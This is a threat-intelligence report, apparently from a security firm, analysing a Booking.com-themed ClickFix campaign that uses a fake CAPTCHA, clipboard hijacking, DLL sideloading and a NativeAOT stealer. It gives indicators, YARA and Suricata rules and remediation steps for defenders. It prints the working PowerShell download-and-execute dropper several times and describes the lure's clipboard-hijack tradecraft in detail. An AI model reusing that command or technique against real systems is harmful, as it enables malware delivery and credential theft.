highPhishing

ClickFix Meets Booking.com: Inside a Multi-Stage Stealer Campaign Built on Clipboard Hijacking, Crimean Bulletproof Hosting, and a 23MB Trojan Horse

PublishedMarch 12, 2026

Threat Actors:ProfileAssessmentvector)

phishingacrstealerdll-sideloadingsocial-engineeringcredential-theftc2aptspearphishing

TL;DR: A social engineering campaign impersonating Booking.com uses the "ClickFix" technique -- a fake CAPTCHA page that copies a malicious PowerShell command to the victim's clipboard and instructs them to paste it into a Windows Run dialog. The PowerShell dropper reaches out to a freshly registered domain hosted on bulletproof infrastructure in Crimea, which delivers a second-stage script that downloads a ZIP archive containing a DLL sideloading package. Inside: a legitimate MSYS2 binary (psl.exe) paired with a 23MB trojanized libpsl-5.dll -- a NativeAOT-compiled .NET information stealer likely related to the ACRStealer/Efimer family. The campaign infrastructure spans five countries, at least eight distribution domains, a network of Booking.com typosquats, and daily payload refreshes dating back to March 4, 2026. The HTML lure page phones home to a Telegram bot every time someone falls for it.

The Lure: A CAPTCHA That Steals Your Clipboard

It starts with a page that looks exactly like what you would expect from Booking.com asking Cloudflare to verify you are human. An animated spinner. A checkbox. The words "Checking if you are human" in clean, corporate typography. A fake Cloudflare Ray ID generated from 16 random hex characters to sell the illusion.

Everything about the page is engineered to feel routine. And that is exactly what makes it dangerous.

The moment you click that checkbox, three things happen simultaneously:

A malicious PowerShell command is copied to your clipboard
The page installs a global copy event listener that intercepts every subsequent clipboard operation and replaces whatever you copy with the same malicious command
A POST request fires off to the backend, sending your verification ID, the referring domain, your user agent, and other telemetry -- almost certainly forwarded to a Telegram bot so the operator gets a real-time ping that a new victim just took the bait

Then the page tells you what to do next: "Press Windows Key + R, then Ctrl+V, then Enter."

This is the ClickFix technique -- also called FakeCaptcha in some reporting. It is not new. But this implementation has a sophistication layer that sets it apart from the garden-variety versions: the malicious command is not hardcoded in the HTML. Instead, the page fetches it from a backend API endpoint at runtime:

GET /ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1

This means the operator can rotate payloads server-side without touching the HTML. The lure page is a shell; the weapon is loaded dynamically. If a security vendor grabs the HTML and detonates it in a sandbox tomorrow, the server can serve a different command -- or nothing at all. The same endpoint also supports geofencing: if the server returns status: "blocked", the victim sees "Access Denied - This service is not available in your region."

The operator is not spraying and praying. They are selecting their targets.

What Was Found vs. What Was Known

Aspect	Prior Reporting	Our Findings
Campaign scope	4 samples reported by JAMESWT_WT on MalwareBazaar	25+ related samples across 3 malware families (ClickFix, ACRStealer, Efimer)
Distribution infrastructure	sabrineme[.]com tagged as distribution	sabrineme[.]com + hailmeinc[.]com + asmweosiqsaaw[.]com + 8 bklmain.* typosquat domains
PS1 dropper domains	solimayticontexta[.]com reported	solimayticontexta[.]com + wiosyrondaty[.]com (same registrar, same nameservers, same playbook)
C2 hosting	Unknown	NHT-MNT / landvps.online -- bulletproof hosting in Sudak, Crimea, operating 20+ /24 blocks across RU/NL/FI/DE/US
Malware family	Unknown	Likely ACRStealer or Efimer variant (NativeAOT .NET stealer with DLL sideloading)
Campaign duration	First seen March 10, 2026	Active since at least March 4, 2026 (certificate issuance dates + MalwareBazaar submission timeline)
HTML lure technique	Tagged "FakeCaptcha"	Full server-side command rotation + Telegram victim notification + global clipboard hijack + geofencing
Booking.com connection	Not reported	8-TLD typosquat network (bklmain.*) built out Feb 26-27, infrastructure pre-staged weeks before campaign launch

The Kill Chain: Seven Steps from CAPTCHA to Credential Theft

[1] PHISHING EMAIL / MALICIOUS LINK
    Victim receives Booking.com-themed message
    (likely via email -- sabrineme.com has Microsoft 365 email configured)
              |
              v
[2] FAKE CAPTCHA PAGE (fakecaptcha.html)
    Pixel-perfect Booking.com / Cloudflare verification
    "Checking if you are human..."
    Fetches payload command from server API at runtime
              |
              v
[3] CLIPBOARD HIJACK + TELEGRAM PING
    Victim clicks checkbox
    --> PowerShell command copied to clipboard
    --> Global copy interceptor installed (all future copies = malicious command)
    --> Operator notified via Telegram with victim telemetry
    --> Page displays: "Press Win+R, Ctrl+V, Enter"
              |
              v
[4] POWERSHELL DROPPER EXECUTES
    powershell -W H -EP B -c iex(irm solimayticontexta[.]com)
    |  -W H    = Hidden window (victim sees nothing)
    |  -EP B   = Bypass execution policy
    |  iex(irm)= Download and execute remote script
              |
              v
[5] SECOND-STAGE DOWNLOADS ZIP PAYLOAD
    Script downloads from sabrineme[.]com/asfixsoftwaredev.zip
    ZIP contains 12 files:
      1 legitimate binary (psl.exe)
      10 legitimate MSYS2 DLLs
      1 trojanized DLL (libpsl-5.dll) -- 23MB
              |
              v
[6] DLL SIDELOADING
    psl.exe launches --> calls LoadLibraryW("libpsl-5.dll")
    Loads the trojanized DLL instead of the legitimate one
    23MB NativeAOT .NET payload with obfuscated exports begins execution
    Drops additional DLLs to %TEMP% with randomized hash filenames
              |
              v
[7] INFORMATION STEALER ACTIVATES
    Credential theft | Cookie extraction | Crypto wallet theft
    Screenshot capture | Browser data harvesting
    C2 communication over HTTPS via TLS 1.3

Every layer of this chain has a fallback. The HTML lure fetches its payload dynamically so the server controls what gets executed. The PowerShell dropper uses a different domain than the payload host, so blocking one does not kill the other. The DLL sideloading uses a legitimate signed binary as the execution vehicle. And the stealer itself is compiled with NativeAOT, which pre-compiles .NET to native code and defeats standard .NET decompilers like dnSpy or ILSpy.

The PowerShell Dropper: 55 Bytes That Start Everything

The entire dropper is a single line:

powershell -W H -EP B -c iex(irm solimayticontexta[.]com)

Fifty-five bytes. That is all it takes. The flags are abbreviated to their minimum: -W H for hidden window, -EP B for execution policy bypass. The iex(irm ...) pattern -- Invoke-Expression wrapping Invoke-RestMethod -- downloads and executes whatever the server returns in a single operation.

When we investigated the C2 domain on March 11, solimayticontexta[.]com returned a spinner/loading HTML page rather than a PowerShell script. This is consistent with server-side filtering: the domain likely checks User-Agent, IP geolocation, or other heuristics before serving the real payload. Hit it from a known security vendor IP range or a datacenter, and you get a benign page. Hit it from a residential IP in a target country, and you get the second-stage script.

The domain was registered on March 8, 2026 through Hello Internet Corp with DNSPod nameservers (a.dnspod.com, b.dnspod.com, c.dnspod.com). Its Let's Encrypt R12 certificate was issued at 10:10:56 UTC on that same day. The trojanized DLL was compiled at 11:24:22 UTC -- approximately one hour later. The operator stood up the domain, obtained the TLS certificate, and compiled the payload in a single morning.

A second dropper domain, wiosyrondaty[.]com, was registered three days earlier on March 5 through the same registrar with the same nameservers. It currently has no A record -- it was used in an earlier wave and has since been decommissioned. Same registrar, same NS infrastructure, same operational pattern.

The Payload: A 23-Megabyte Trojan in Sheep's Clothing

The ZIP archive (asfixsoftwaredev.zip, 15.4MB) downloads from sabrineme[.]com and unpacks into 12 files. Eleven of them are perfectly legitimate. One of them is not.

The Sideloading Package

File	Size	Legitimate	Purpose
psl.exe	--	Yes	MSYS2 Public Suffix List utility (GCC 14.2.0), the execution vehicle
libpsl-5.dll	23,367,680	NO	Trojanized -- NativeAOT .NET stealer payload
msys-2.0.dll	--	Yes	MSYS2 runtime library
libunistring-5.dll	--	Yes	Unicode string library
libiconv-2.dll	--	Yes	Character set conversion
libintl-8.dll	--	Yes	GNU gettext internationalization
libidn2-0.dll	--	Yes	Internationalized domain names
msys-unistring-5.dll	--	Yes	MSYS2 unicode
msys-iconv-2.dll	--	Yes	MSYS2 iconv
msys-idn2-0.dll	--	Yes	MSYS2 IDN
msys-intl-8.dll	--	Yes	MSYS2 internationalization
msys-psl-5.dll	--	Yes	Legitimate MSYS2 PSL library (the real one)

The technique is DLL sideloading. psl.exe is a legitimate, signed MSYS2 binary. When it launches, it calls LoadLibraryW to load libpsl-5.dll. Under normal circumstances, that would load the real PSL library. But the operator has replaced it with their trojanized version, and psl.exe loads it without complaint because the function name matches, the file name matches, and Windows does not care about the rest.

Notice that the ZIP even includes the legitimate msys-psl-5.dll alongside the trojanized libpsl-5.dll. The real library is there as a dependency of other MSYS2 components. The attacker knows exactly which DLL gets loaded by psl.exe and has surgically replaced only that one.

Inside the Trojanized DLL

The malicious libpsl-5.dll is a 23MB PE32+ DLL compiled for x86-64. At 17 out of 76 detections on VirusTotal as of March 10, it is flying under most AV radar. That low detection rate is not accidental -- it is a direct consequence of the NativeAOT compilation strategy.

PE Section Layout:

Section	Virtual Size	Raw Size	What It Contains
`.text`	534 KB	534 KB	Native entry point, bootstrapping code
`.managed`	10 MB	10 MB	NativeAOT-compiled .NET code -- the actual stealer logic
`hydrated`	4.7 MB	0 bytes	Virtual-only section, unpacked at runtime
`.rdata`	10 MB	10 MB	PSL data + read-only constants
`.data`	360 KB	78 KB	Mutable data, partially initialized
`.pdata`	818 KB	818 KB	Exception handling metadata
`.reloc`	1.5 MB	1.5 MB	Relocation table

The .managed section is the key. NativeAOT compilation takes .NET intermediate language and compiles it ahead-of-time to native machine code. The result is a binary that runs without the .NET runtime and cannot be decompiled with standard .NET tools. No IL to decompile. No metadata to parse. Just native x86-64 instructions. This is why the file is 23MB -- it embeds the entire .NET runtime and all library dependencies directly into the binary.

The hydrated section (4.7MB virtual, 0 bytes on disk) is a NativeAOT pattern for runtime-initialized data structures. It exists only in memory after the DLL loads, making static analysis even harder.

The Fake Identity:

The PE metadata is pure nonsense, generated by an automated randomizer:

Original Filename: DefectiveSitcoms.exe
Product Name:      Outsmell Chamite
Description:       Latinity archebancs chicaning tabulators mycetomas
                   lifelikeness metapneustic.
Copyright:         2026 Satiny Cicisbeism Group
Internal Name:     Calipee Localized

"Outsmell Chamite." "Satiny Cicisbeism Group." These are not words chosen by a human. They are the output of a metadata randomization tool that picks from a dictionary to fill in PE version info fields, generating a unique fingerprint for each build to defeat hash-based detection.

The Export Functions:

0Ol9Ijk4ZjzGTSRJB3yC3VfR0DWvTW
0pm7yRyADSugd2xCNW
1syqCjGdWjHjyuUx1HY2
zDEM66ipiLj77VnHgdLiwJ
yoHKEbQKZEwK9jCKtL

Random alphanumeric strings that change with every build. No semantic meaning. No function names to reverse engineer.

Embedded Libraries Tell the Story:

Even though the code itself resists decompilation, the NativeAOT compilation process embeds string references to the .NET libraries used. These paint a clear picture of what this stealer does:

Library	What It Implies
ImageSharp	Screenshot capture -- the stealer grabs what is on your screen
MessagePack-CSharp	Binary serialization for C2 communication -- compact, fast exfiltration
Polly	Resilience and retry patterns -- if the C2 is down, the stealer waits and tries again
libphonenumber-csharp	Phone number parsing -- victim profiling, potentially SMS-based account takeover
Newtonsoft.Json	JSON processing -- parsing stolen browser data, cookie databases, wallet configs
NodaTime	Timezone handling -- the stealer knows where you are
YamlDotNet	YAML config parsing -- reading its own configuration, possibly from a remote source
Humanizer	String formatting -- cleaning up stolen data for exfiltration
System.Security.Cryptography	Encrypted C2 communications and/or data encryption
System.Net.Http/Sockets/Security	Networking stack for C2 communication

This is not a keylogger someone downloaded from a hacking forum. This is a purpose-built information stealing platform with retry logic, screenshot capability, phone number intelligence, and binary-serialized exfiltration over encrypted channels.

Sandbox Behavior:

VirusTotal sandboxes caught the DLL making DNS queries to 162.159.36.2 (Cloudflare DNS) and creating temporary DLLs in %TEMP% with randomized 32-character hex filenames:

%TEMP%\cfad566e7a7deb84ae6501d28ab2c326.dll
%TEMP%\a74e578157a556a7305671d198b7137f.dll

These are loaded via rundll32.exe with obfuscated export ordinals -- the stealer is unpacking additional modules at runtime. Notably, the Yomi Hunter sandbox flagged the DLL as MALICIOUS while Zenbox rated it CLEAN, indicating the stealer has sandbox evasion capabilities that work against some but not all analysis environments.

The Infrastructure: Five Countries, Zero Cooperation

The infrastructure behind this campaign is deliberately distributed across jurisdictions that do not cooperate with each other on cybercrime. Every domain, every IP, every hosting provider was chosen to maximize the difficulty of a coordinated takedown.

The Hosting Hierarchy

TIER 0 — Upstream Providers (legitimate)
  Hetzner (Germany)  |  Unified Layer (USA)  |  ORG-NFS9-RIPE (Tajikistan)
         |                     |                          |
TIER 1 — Resellers / Shared Hosting
  BigBangServers           HostGator India             Unknown
    |          |                  |
TIER 2 — Operational Infrastructure
  sabrineme.com    SPF host    hailmeinc.com + bklmain.*
  (payload ZIP)                asmweosiqsaaw.com
                               (distribution)

TIER 0 — C2 Provider (bulletproof)
  NHT-MNT / landvps.online (AS216334)
  Sudak, Crimea — zero LE cooperation
         |
TIER 1 — C2 Domains
  solimayticontexta.com (active — serves PS1 dropper)
  wiosyrondaty.com (dead — previous wave)

Network Infrastructure Detail

IP Address	ASN / Provider	Location	Services	Role
109[.]107[.]161[.]194	AS216334 / NHT-MNT (landvps.online)	Sudak, Crimea, RU	nginx, TLS 1.3 (port 443)	PS1 dropper C2 -- serves second-stage script
116[.]202[.]222[.]249	Hetzner / BigBangServers (host03)	Germany	LiteSpeed, cPanel, Exim (80, 110, 443, 587, 993, 995, 2082-2087)	ZIP payload hosting -- sabrineme[.]com
203[.]161[.]33[.]166	BigBangServers (host01)	India	OpenResty, MariaDB, cPanel (53, 80, 110, 443, 993, 2082-2096, 3306, 52230)	Previous/backup host for sabrineme[.]com
162[.]241[.]123[.]127	AS46606 / Unified Layer (Bluehost)	USA	HostGator shared hosting	Distribution -- hailmeinc[.]com + all bklmain.* domains
95[.]85[.]244[.]166	ORG-NFS9-RIPE	Tajikistan	Cloudflare-proxied	Distribution -- asmweosiqsaaw[.]com

The Crimean C2

The C2 server at 109[.]107[.]161[.]194 deserves special attention. It is operated by NHT-MNT / landvps.online (New Hosting Technologies LLC), registered at Gvardeyskaya str. 3, kv. 63, Sudak 298000, Crimea. The abuse contact is info@landvps.ru.

This is not hosting chosen by accident. Crimea is an occupied territory under international sanctions. No Western law enforcement agency has jurisdiction. No abuse report will be actioned. No court order will be served. The hosting provider operates 20+ /24 blocks across Russia, the Netherlands, Finland, Germany, and the United States -- a distributed footprint that makes network-level blocking a game of whip-a-mole.

For the threat actor, landvps.online is not just a host. It is a guarantee that the C2 stays online.

The Booking.com Typosquat Network

Certificate transparency logs for hailmeinc[.]com revealed something the original reporting missed entirely: a network of Booking.com typosquat domains set up weeks before the campaign launched.

Between February 26 and 27, 2026, wildcard certificates were issued for:

Domain	TLD	Resolves To
bklmain[.]store	.store	162[.]241[.]123[.]127
bklmain[.]club	.club	162[.]241[.]123[.]127
bklmain[.]fun	.fun	162[.]241[.]123[.]127
bklmain[.]shop	.shop	162[.]241[.]123[.]127
bklmain[.]online	.online	162[.]241[.]123[.]127
bklmain[.]site	.site	162[.]241[.]123[.]127
bklmain[.]website	.website	162[.]241[.]123[.]127
blkmain[.]xyz	.xyz	162[.]241[.]123[.]127

All eight domains resolve to the same Bluehost IP that hosts hailmeinc[.]com. "bklmain" and "blkmain" are both plausible abbreviations of "Booking main" -- and the TLD spray (.store, .club, .fun, .shop, .online, .site, .website, .xyz) ensures at least some will survive domain takedown attempts.

The certificates were issued a full 12 days before the first malware sample appeared on MalwareBazaar. This was infrastructure pre-staging -- the operator built the phishing network in late February and did not begin active distribution until early March.

OPSEC Failures

The operator made real mistakes:

Shared registrar fingerprint: Both PS1 dropper domains (solimayticontexta[.]com and wiosyrondaty[.]com) were registered through Hello Internet Corp with DNSPod nameservers. Same registrar + same NS = trivially linkable.
Exposed .git repository: sabrineme[.]com returns HTTP 403 on /.git/HEAD. The directory exists. It is access-denied, not 404. If anyone manages to bypass that 403 -- through a misconfigured backup, a path traversal, or a moment of operator carelessness -- the full source code history of whatever is deployed there becomes available.
Microsoft 365 email on sabrineme[.]com: The domain's MX records point to sabrineme-com.mail.protection.outlook.com. Microsoft 365 accounts have identity requirements. This is a potential attribution vector.
Certificate transparency exposure: The hailmeinc[.]com certificates inadvertently revealed the entire bklmain.* portfolio before the campaign even launched.
Same hosting provider for primary and backup: Both host01.bigbangservers.com (203.161.33.166) and host03.bigbangservers.com (116.202.222.249) are BigBangServers infrastructure. Seizing one hosting provider compromises both the active and fallback infrastructure.
Reused sideloading technique: The same psl.exe + libpsl-5.dll combination appears in every wave of this campaign. Once you know the pattern, every new variant is immediately identifiable.

The Broader Campaign: It Is Not Just Booking.com

MalwareBazaar tag correlation reveals this is not an isolated Booking.com operation. It is one vertical in a broader ClickFix ecosystem:

SHA256 (truncated)	First Seen	Distribution Domain	PS1 Domain	Family
cd27f2bd6d46...	2026-03-10	hailmeinc[.]com	--	ClickFix/FakeCaptcha
06c7cd604169...	2026-03-07	hailmeinc[.]com	--	ClickFix/FakeCaptcha
3a85ba5c84ce...	2026-03-06	hailmeinc[.]com	wiosyrondaty[.]com	ClickFix/FakeCaptcha
cae1cf84ee06...	2026-03-04	hailmeinc[.]com	--	ClickFix/FakeCaptcha
ee15d5c33141...	2026-03-07	--	--	ACRStealer / ClickFix
cefdab4dfcef...	2026-03-08	--	--	Efimer / ClickFix

Three malware families. 25+ samples. Daily DLL recompilations with fresh metadata randomization. New ZIP filenames for each wave. This is an operation with velocity -- the operator is iterating fast, burning indicators, and moving on.

The earliest confirmed sample dates to March 4. The earliest certificate issuance (for the bklmain.* infrastructure) dates to February 26. The campaign had at least a week of infrastructure preparation before the first payload went live.

Timeline

Date	Event	Evidence
2026-02-26	bklmain.* certificates issued; infrastructure pre-staging begins	CT log analysis
2026-03-04	First campaign sample submitted to MalwareBazaar	MB submission timestamp
2026-03-04	hailmeinc[.]com wildcard certificate issued	CT log
2026-03-05	wiosyrondaty[.]com registered (first PS1 dropper domain)	WHOIS
2026-03-05	sabrineme[.]com wildcard certificate via Google Trust Services	CT log
2026-03-06	Sample links wiosyrondaty[.]com to hailmeinc[.]com distribution	MB tag correlation
2026-03-08	solimayticontexta[.]com registered (second PS1 dropper domain)	WHOIS
2026-03-08	Let's Encrypt certificate issued for solimayticontexta[.]com at 10:10 UTC	CT log
2026-03-08	libpsl-5.dll compiled at 11:24 UTC (one hour after cert issuance)	PE timestamp
2026-03-10	JAMESWT_WT reports 4 samples; HuntYethHounds submits IOCs to ThreatFox	MB / ThreatFox
2026-03-10	URLScan confirms sabrineme[.]com serving asfixsoftwaredev.zip (200 at 20:01, 404 by 21:50)	URLScan.io
2026-03-11	Breakglass Intelligence investigation: 25+ samples mapped, full infrastructure exposed	This report

Detection

YARA Rules

ClickFix HTML Lure Detection -- catches FakeCaptcha pages with the Telegram notification function, command fetch endpoint, and clipboard hijack:

rule ClickFix_FakeCaptcha_HTML {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "ClickFix/FakeCaptcha HTML lure with clipboard hijack and Telegram notification"
        date = "2026-03-10"

    strings:
        $s1 = "sendTelegramNotification" ascii
        $s2 = "get_command=1" ascii
        $s3 = "verification_id" ascii
        $s4 = "clipboardData" ascii
        $s5 = "I'm not a robot" ascii
        $s6 = "Windows Key" ascii
        $s7 = "Booking" ascii nocase
        $html = "<html" ascii nocase

    condition:
        $html and 3 of ($s*)
}

Trojanized DLL Detection -- keys on the NativeAOT section names, embedded library references, and the randomized PE metadata:

rule ClickFix_Trojanized_LibPSL_DLL {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "Trojanized libpsl-5.dll -- NativeAOT .NET stealer"
        date = "2026-03-10"

    strings:
        $sec_managed = ".managed" ascii
        $sec_hydrated = "hydrated" ascii
        $rt1 = "System.Net.Http" ascii
        $rt2 = "System.Net.Sockets" ascii
        $rt3 = "System.Security.Cryptography" ascii
        $rt4 = "MessagePack" ascii
        $rt5 = "Newtonsoft.Json" ascii
        $rt6 = "ImageSharp" ascii
        $rt7 = "Humanizer" ascii
        $rt8 = "Polly" ascii
        $psl = "psl_builtin" ascii
        $meta1 = "DefectiveSitcoms" ascii wide
        $meta2 = "Outsmell Chamite" ascii wide
        $meta3 = "Calipee Localized" ascii wide
        $meta4 = "Satiny Cicisbeism" ascii wide

    condition:
        uint16(0) == 0x5A4D and filesize > 15MB and
        $sec_managed and $sec_hydrated and
        4 of ($rt*) and 1 of ($meta*)
}

Generic NativeAOT PSL Sideload Detection -- catches future variants even with different metadata:

rule ClickFix_Trojanized_LibPSL_Generic {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "Generic detection for trojanized libpsl-5.dll with NativeAOT .NET payload"

    strings:
        $sec_managed = ".managed" ascii
        $sec_hydrated = "hydrated" ascii
        $rt1 = "System.Net.Http" ascii
        $rt2 = "System.Net.Sockets" ascii
        $rt3 = "System.Security.Cryptography" ascii
        $lib1 = "MessagePack" ascii
        $lib2 = "ImageSharp" ascii
        $psl = "psl_builtin" ascii

    condition:
        uint16(0) == 0x5A4D and filesize > 10MB and filesize < 40MB and
        $sec_managed and $sec_hydrated and 2 of ($rt*) and 1 of ($lib*) and $psl
}

ZIP Sideloading Package Detection:

rule ClickFix_DLL_Sideload_Package {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "ZIP archive containing psl.exe DLL sideloading package"

    strings:
        $zip = { 50 4B 03 04 }
        $psl_exe = "psl.exe" ascii
        $libpsl = "libpsl-5.dll" ascii
        $msys = "msys-2.0.dll" ascii
        $libiconv = "libiconv-2.dll" ascii

    condition:
        $zip at 0 and $psl_exe and $libpsl and $msys and $libiconv
}

Suricata Rules

C2 and distribution domain detection:

# PS1 dropper C2 domain lookups
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix C2 DNS - solimayticontexta.com"; dns.query; content:"solimayticontexta"; nocase; sid:2026031001; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix C2 DNS - wiosyrondaty.com"; dns.query; content:"wiosyrondaty"; nocase; sid:2026031002; rev:1;)

# Distribution domain lookups
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - sabrineme.com"; dns.query; content:"sabrineme"; nocase; sid:2026031003; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - hailmeinc.com"; dns.query; content:"hailmeinc"; nocase; sid:2026031004; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - asmweosiqsaaw.com"; dns.query; content:"asmweosiqsaaw"; nocase; sid:2026031005; rev:1;)

# Booking typosquat domains
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Booking Typosquat - bklmain"; dns.query; content:"bklmain"; nocase; sid:2026031006; rev:1;)

# C2 IP -- block all traffic to Crimean BPH
alert ip $HOME_NET any -> 109.107.161.194 any (msg:"BREAKGLASS ClickFix C2 IP - landvps Crimea BPH"; sid:2026031008; rev:1;)

# ZIP payload downloads
alert http $HOME_NET any -> any any (msg:"BREAKGLASS ClickFix Payload - asfixsoftwaredev.zip"; flow:to_server,established; http.uri; content:"/asfixsoftwaredev.zip"; sid:2026031011; rev:1;)
alert http $HOME_NET any -> any any (msg:"BREAKGLASS ClickFix Payload - bkmsiqop.zip"; flow:to_server,established; http.uri; content:"/bkmsiqop.zip"; sid:2026031012; rev:1;)

# Known BPH range
alert ip $HOME_NET any -> 109.107.161.0/24 any (msg:"BREAKGLASS Traffic to NHT-MNT/landvps.online Range (Known BPH)"; sid:2026031015; rev:1;)

Endpoint Detection Queries

PowerShell execution with ClickFix flags (EDR/SIEM):

process_name:"powershell.exe" AND command_line:("-W H" AND "-EP B" AND "iex" AND "irm")

DLL sideloading via psl.exe:

process_name:"psl.exe" AND loaded_dll:"libpsl-5.dll" AND dll_size:>15000000

Temp directory DLL creation:

file_path:"%TEMP%\\*.dll" AND file_name_length:36 AND file_extension:"dll"

Behavioral Indicators

Indicator Type	Value
PowerShell pattern	`powershell -W H -EP B -c iex(irm <domain>)`
DLL sideloading	`psl.exe` loading `libpsl-5.dll` with randomized export names
Temp DLL creation	`%TEMP%\<32-char-hex>.dll` with DllMain export
JARM (C2)	`2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7`
JARM (sabrineme)	`29d29d00029d29d00042d43d00041d598ac0c1012db967bb1ad0ff2491b3ae`

MITRE ATT&CK Mapping

Tactic	Technique	ID	How It Applies
Initial Access	Phishing: Spearphishing Link	T1566.002	Booking.com-themed phishing link delivers victim to fake CAPTCHA
Execution	User Execution: Malicious Link	T1204.001	Victim clicks checkbox, pastes command into Run dialog
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	`powershell -W H -EP B -c iex(irm ...)`
Persistence	Hijack Execution Flow: DLL Side-Loading	T1574.002	psl.exe loads trojanized libpsl-5.dll
Defense Evasion	Obfuscated Files or Information	T1027	NativeAOT compilation, randomized PE metadata, obfuscated exports
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	Malicious DLL named libpsl-5.dll to match legitimate MSYS2 library
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Geofenced C2 responses, divergent sandbox results (Yomi vs Zenbox)
Credential Access	Credentials from Web Browsers	T1555.003	Stealer indicators: cookie references, browser data extraction
Collection	Screen Capture	T1113	ImageSharp library embedded for screenshot capture
Command and Control	Web Protocols	T1071.001	HTTPS C2 communication via nginx
Command and Control	Encrypted Channel: Asymmetric Crypto	T1573.002	TLS 1.3 with AES-256-GCM
Exfiltration	Exfiltration Over C2 Channel	T1041	Stolen data sent via MessagePack-serialized HTTPS
Resource Development	Acquire Infrastructure: Domains	T1583.001	8+ purpose-registered domains across 4+ registrars

Indicators of Compromise

File Indicators

Artifact	SHA256	Type
libpsl-5.dll (trojanized)	`08887f949d9a15dba1d89e4a0a4e37435856cd0de5f3d739f1fad40382bed71b`	PE32+ DLL (x64), 23.4MB
asfixsoftwaredev.zip	`695af1fa1e6492496c721f401bdcb3c4cc839f0e884158ad48c041ef895a2650`	ZIP archive, 15.4MB
ps1.ps1 (dropper)	`56b1db6d6aad59f2fc90d107b0d27e905528e23689757627ed0e4fd1061d0a96`	PowerShell, 55 bytes
fakecaptcha.html (lure)	`a6d3152fe570b575337cc35d3c07adea259e41bcfd91cfbe838e55179e766aa5`	HTML, 19.6KB
psl.exe (legitimate)	`12c931dbfa907d4e394fb928f3a8a27ed7e5bf203578dabcd65bb2dd5f2f1280`	PE32+ EXE (x64)

Additional hashes for the trojanized DLL:

MD5:     9f64ea9bfd8954057df175532d27088a
Imphash: c408d5c45cb005ed3b8a08b7f7ecefdd

Network Indicators -- Domains

# PS1 Dropper C2 (active)
solimayticontexta[.]com        109[.]107[.]161[.]194    LIVE

# PS1 Dropper C2 (previous wave)
wiosyrondaty[.]com             (no A record)            DEAD

# Payload Distribution
sabrineme[.]com                116[.]202[.]222[.]249    LIVE (payload removed)
hailmeinc[.]com                162[.]241[.]123[.]127    LIVE
asmweosiqsaaw[.]com            95[.]85[.]244[.]166      LIVE

# Booking.com Typosquats (all on 162[.]241[.]123[.]127)
bklmain[.]store
bklmain[.]club
bklmain[.]fun
bklmain[.]shop
bklmain[.]online
bklmain[.]site
bklmain[.]website
blkmain[.]xyz

Network Indicators -- IPs

109[.]107[.]161[.]194    PS1 C2          NHT-MNT/landvps.online, Crimea BPH (AS216334)
116[.]202[.]222[.]249    Payload host    BigBangServers/Hetzner (host03)
203[.]161[.]33[.]166     Backup host     BigBangServers (host01), MariaDB exposed on 3306
162[.]241[.]123[.]127    Distribution    Unified Layer/Bluehost (AS46606)
95[.]85[.]244[.]166      Distribution    ORG-NFS9-RIPE, Tajikistan

Network Indicators -- URLs

hxxps://solimayticontexta[.]com                                                PS1 second-stage download
hxxps://sabrineme[.]com/asfixsoftwaredev.zip                                  Payload ZIP delivery
hxxps://hailmeinc[.]com/bkmsiqop.zip                                          Alternate payload ZIP
/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1                   Command fetch endpoint
/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s (POST)                          Telegram notification endpoint

Certificate Indicators

Domain	Serial	Issuer	Issued
solimayticontexta[.]com	`06b904bd686958aa0e1de21169cb398d6b96`	Let's Encrypt R12	2026-03-08
sabrineme[.]com (wildcard)	`2162305041d5fcde0de7238205b8a1d8`	Google Trust Services WE1	2026-03-05

Recommended Actions

Immediate (24-48 hours):

Block all IOC domains and IPs at network perimeter
Search email gateway logs for Booking.com-themed phishing emails linking to identified domains
Hunt for PowerShell execution with -W H -EP B flags in EDR/SIEM
Search for psl.exe execution and libpsl-5.dll loads in endpoint telemetry
Check for temp directory DLLs matching pattern %TEMP%\<32-hex>.dll

Short-term (1-2 weeks):

Deploy YARA rules across endpoint fleet
Deploy Suricata rules at network sensors
Report domains to respective registrar abuse contacts
Share IOCs with industry ISACs and sector-specific threat sharing groups

Medium-term (1-3 months):

Monitor for new ClickFix variants using the psl.exe / libpsl-5.dll sideloading pattern
Set up CT log monitoring for new certificates on campaign domains
Track NHT-MNT / landvps.online IP ranges for new C2 deployments
Monitor Hello Internet Corp + DNSPod registrations for new dropper domains

Published by Breakglass Intelligence. Investigation conducted 2026-03-11. 1 fake CAPTCHA. 5 countries. 23 million bytes of NativeAOT betrayal. And a Telegram bot that pings every time someone falls for it. Classification: TLP:CLEAR